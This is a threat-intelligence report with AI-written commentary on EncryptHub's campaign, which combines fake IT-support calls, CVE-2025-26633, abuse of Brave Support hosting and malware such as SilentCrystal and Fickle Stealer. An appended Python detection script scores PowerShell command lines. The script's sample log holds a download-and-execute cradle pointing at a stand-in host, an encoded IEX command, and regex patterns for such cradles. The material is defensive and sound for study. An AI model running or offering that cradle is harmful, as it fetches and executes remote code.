When Hackers Call: Social Engineering, Abusing Brave Support, and EncryptHub's Expanding Arsenal
NetmanageIT OpenCTI - opencti.netmanageit.com

SUMMARY:
EncryptHub, an emerging threat group, has launched a campaign combining social engineering with exploitation of CVE-2025-26633 to deliver malicious payloads. The attackers impersonate IT support staff, use remote desktop sessions, and execute PowerShell commands to deploy malware. The campaign abuses the Brave Support platform to host payloads and employs new tools like SilentCrystal and a SOCKS5 proxy backdoor. EncryptHub also created a fake video call platform, RivaTalk, to distribute malware. The group's tactics include using AES-encrypted commands, generating fake browser traffic, and exploiting system vulnerabilities. This adaptive adversary highlights the need for layered defense strategies, ongoing threat intelligence, and user awareness training to mitigate risks.
OPENCTI LABELS:
powershell,social engineering,golang,fickle stealer,cve-2025-26633,socks5 proxy,silentcrystal,rivatalk,brave support
AI COMMENTARY:
1. When Hackers Call: An Emerging Threat Landscape
EncryptHub has rapidly emerged as a sophisticated adversary that blends traditional social engineering with technical exploits to infiltrate targets. Their latest campaign begins with a seemingly innocuous phone call or email that mimics legitimate IT support outreach. By posing as Brave Support representatives, they build trust with unsuspecting victims before pivoting to a more technical angle. This fusion of human manipulation and digital exploitation underscores the evolving threat landscape and the importance of proactive threat intelligence.

2. The Social Engineering Playbook
EncryptHub’s operators excel at psychological manipulation, leveraging scripts that mimic common IT helpdesk protocols. Victims are guided through fake troubleshooting steps in remote desktop sessions, where attackers introduce malicious PowerShell commands disguised as routine maintenance. The group’s use of RivaTalk, a custom video call platform written in Go, further cements their credibility by simulating authentic video support interactions. This level of deception illustrates how social engineering remains a cornerstone of modern cyberattacks.

3. Exploiting CVE-2025-26633 and Hosting on Brave Support
Once trust is established, EncryptHub exploits CVE-2025-26633 to execute arbitrary code on vulnerable systems. Malicious payloads are hosted on compromised Brave Support infrastructure, allowing the group to bypass many security filters. The initial download often occurs under the guise of a routine software update, making detection difficult without robust intrusion detection systems. Victims who follow the attackers’ guidance unwittingly introduce a remote access Trojan that grants full system control to the threat actors.

4. The Malware Arsenal: SilentCrystal, SOCKS5 Proxy, and Fickle Stealer
EncryptHub’s toolkit has expanded to include a custom backdoor called SilentCrystal, which leverages AES-encrypted commands for secure communications. Once deployed, SilentCrystal establishes a SOCKS5 proxy that tunnels traffic through infected hosts to conceal the attackers’ true location. In parallel, the group deploys Fickle Stealer, a Golang-based credential harvester that exfiltrates browser data, saved passwords, and cryptocurrency wallets. This dual-pronged approach maximizes data theft while maintaining persistent access.

5. Evasion Techniques and Operational Security
To evade detection, EncryptHub injects fake browser traffic and spoofs user agent strings to mimic normal browsing patterns. Their PowerShell scripts are obfuscated and executed in memory, leaving minimal forensic artifacts on disk. Communication channels are protected with AES encryption, preventing security tools from inspecting commands and payloads. The adversary’s commitment to operational security highlights the ongoing arms race between defenders and sophisticated threat actors.

6. Mitigation and Defense Strategies
Defending against EncryptHub’s multi-layered campaign requires a comprehensive approach. Organizations should deploy endpoint detection solutions capable of identifying unusual PowerShell activity and proxy tunneling. Regular patching to close CVE-2025-26633 and other vulnerabilities is critical, as is network segmentation to isolate support platforms like Brave Support. User awareness training focused on recognizing social engineering attempts and verifying support requests can thwart initial contact. Finally, continuous threat intelligence feeds will ensure defenders stay ahead of emerging tools like SilentCrystal and Fickle Stealer, transforming insights into actionable defenses.
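Sections 5 and 6 describe obfuscated, in-memory PowerShell launched during fake support sessions and the need for endpoint detection that spots such activity. The following triage script is an added illustration, not code from the report or from any vendor: it scores constructed process-creation records (host, user, command line) against common cradle and obfuscation indicators. Indicator weights, the threshold and the sample log lines are assumptions made for the example.

```python
import re

# Heuristic indicators of download cradles and in-memory / encoded execution.
# (name, pattern, weight); weights are illustrative assumptions, not tuned values.
INDICATORS = [
    ("encoded_command",   re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I), 4),
    ("base64_decode",     re.compile(r"FromBase64String", re.I), 2),
    ("invoke_expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    ("download_cradle",   re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I), 2),
    ("hidden_window",     re.compile(r"-w(in(dowstyle)?)?\s+hidden", re.I), 1),
    ("bypass_policy",     re.compile(r"-(ep|ex|exec|executionpolicy)\s+bypass", re.I), 1),
    ("noprofile",         re.compile(r"-nop(rofile)?\b", re.I), 1),
    ("reflective_load",   re.compile(r"\[Reflection\.Assembly\]::Load|Assembly::Load", re.I), 3),
]

# Constructed sample records in a simple "host|user|command" form (not real telemetry).
SAMPLE_LOG = [
    "WS01|alice|powershell.exe Get-ChildItem C:\\Users\\alice\\Documents",
    "WS02|bob|powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://update.example.invalid/update.ps1')\"",
    "WS03|carol|powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA",
    "WS04|dave|powershell.exe -Command \"Update-Help\"",
]


def score_command(cmd):
    """Return (score, [indicator names]) for one PowerShell command line."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(cmd)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits


def triage(log_lines, threshold=4):
    """Parse host|user|command records and return those at or above the threshold."""
    findings = []
    for line in log_lines:
        host, user, cmd = line.split("|", 2)
        score, hits = score_command(cmd)
        if score >= threshold:
            findings.append({"host": host, "user": user, "score": score, "hits": hits})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f['host']} ({f['user']}): score={f['score']} indicators={', '.join(f['hits'])}")
```

A single encoded or hidden-window flag is common in legitimate administration; the weighted sum is meant to surface the combination of cradle, hidden window and policy bypass that a walked-through "support session" tends to produce, so tune the threshold against your own baseline.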